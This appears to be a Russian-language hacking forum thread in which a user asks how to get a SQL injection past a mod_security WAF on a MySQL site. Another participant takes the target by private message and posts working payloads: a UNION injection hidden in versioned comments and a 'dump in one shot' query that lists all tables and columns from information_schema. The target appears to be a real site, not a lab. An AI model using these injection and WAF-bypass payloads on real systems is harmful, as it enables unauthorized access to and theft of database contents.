PDA

Просмотр полной версии : Sqlmap + waf


OSW
04.05.2016, 13:00
Есть boolean-based blind, есть waf (mod_security), вытащил дб/юзера/хост ч-з sqlmap с набором стандартных тамперов. Но при попытках вытащить таблицы и проч., натыкаюсь на waf'ную 406 ошибку.

Вижу вектор движения: information -> inform%0bation (так отрабатывает), но уперся в автоматизацию этого действия. Есть какие-то решения?

SooLFaa
04.05.2016, 13:50
DIOS - DUMP IN ONE SHOT. Технология SQL Injection с помощью которой можно вывести все таблицы столбцы а далее в тот же скуль мап ты уже можешь указать имя конкретной таблицы. Это как один из вариантов.

faza02
04.05.2016, 14:31
↑ (https://antichat.live/posts/3980531/)
DIOS - DUMP IN ONE SHOT. Технология SQL Injection с помощью которой можно вывести все таблицы столбцы а далее в тот же скуль мап ты уже можешь указать имя конкретной таблицы. Это как один из вариантов.


особенно актуально с blind

SooLFaa
04.05.2016, 14:36
↑ (https://antichat.live/posts/3980542/)
особенно актуально с blind


OUT OF BAND - как вариант.

BabaDook
04.05.2016, 14:37
↑ (https://antichat.live/posts/3980542/)
особенно актуально с blind


Как подъёб звучал

SooLFaa
04.05.2016, 14:39
↑ (https://antichat.live/posts/3980546/)
Как подъёб звучал


Подъёб засчитан.

faza02
04.05.2016, 14:47
oob есть не для всех бд, тут скорее речь о mysql

SooLFaa
04.05.2016, 14:56
↑ (https://antichat.live/posts/3980552/)
oob есть не для всех бд, тут скорее речь о mysql


Полностью согласен. Но вдруг....

OSW
04.05.2016, 18:22
↑ (https://antichat.live/posts/3980545/)
OUT OF BAND - как вариант.


Благодарю, но не сработало.

SooLFaa
04.05.2016, 19:41
↑ (https://antichat.live/posts/3980617/)
Благодарю, но не сработало.


Я так понимаю, что СУБД MySQL?

OSW
05.05.2016, 11:32
↑ (https://antichat.live/posts/3980639/)
Я так понимаю, что СУБД MySQL?


Да, забыл указать сразу.

SooLFaa
05.05.2016, 11:43
↑ (https://antichat.live/posts/3980772/)
Да, забыл указать сразу.


Скинь в лс таргет, после работы попробуем покрутить.

SooLFaa
05.05.2016, 13:55
Во - первых, неправильно определил вектор. Здесь самый обычный UNION (ну есессно если есть юнион бэйсед есть и блайнд, никто не спорит). Тоже касается и payload для waf bypass.

Валидный запрос в твоем случае выглядет так:

../news/0'+/*!12345UnIon*/+select+1,2,(Select+Table_Name+From+/*!information_schema*/.Tables+limit+1,1),4,5,6,7,8,9,0+--+'(/ (https://host/news/0'+/*!12345UnIon*/+select+1,2,(Select+Table_Name+From+/*!information_schema*/.Tables+limit+1,1),4,5,6,7,8,9,0+--+'(/)

DIOS.

..news/0'+/*!12345UnIon*/+select+1,2,(Select export_set(5,@:=0,(select count(*)from(information_schema.columns)where@:=ex port_set(5,export_set(5,@,table_name,0x3c6c693e,2) ,column_name,0xa3a,2)),@,2)) ,4,5,6,7,8,9,0+--+'(/ (http://host/news/0'+/*!12345UnIon*/+select+1,2,(Select%20export_set(5,@:=0,(select%20 count(*)from(information_schema.columns)where@:=ex port_set(5,export_set(5,@,table_name,0x3c6c693e,2) ,column_name,0xa3a,2)),@,2))%20,4,5,6,7,8,9,0+--+'(/)

И всё проще без sqlmap. Валидную ссылку отправил в лс.

OSW
05.05.2016, 15:19
↑ (https://antichat.live/posts/3980804/)
Во - первых, неправильно определил вектор. Здесь самый обычный UNION (ну есессно если есть юнион бэйсед есть и блайнд, никто не спорит). Тоже касается и payload для waf bypass.
Валидный запрос в твоем случае выглядет так:
../news/0'+/*!12345UnIon*/+select+1,2,(Select+Table_Name+From+/*!information_schema*/.Tables+limit+1,1),4,5,6,7,8,9,0+--+'(/ (https://host/news/0'+/*!12345UnIon*/+select+1,2,(Select+Table_Name+From+/*!information_schema*/.Tables+limit+1,1),4,5,6,7,8,9,0+--+'(/)
DIOS.
..news/0'+/*!12345UnIon*/+select+1,2,(Select export_set(5,@:=0,(select count(*)from(information_schema.columns)where@:=ex port_set(5,export_set(5,@,table_name,0x3c6c693e,2) ,column_name,0xa3a,2)),@,2)) ,4,5,6,7,8,9,0+--+'(/ (http://host/news/0'+/*!12345UnIon*/+select+1,2,(Select%20export_set(5,@:=0,(select%20 count(*)from(information_schema.columns)where@:=ex port_set(5,export_set(5,@,table_name,0x3c6c693e,2) ,column_name,0xa3a,2)),@,2))%20,4,5,6,7,8,9,0+--+'(/)
И всё проще без sqlmap. Валидную ссылку отправил в лс.


Мегареспектище!

Курю, где был не прав.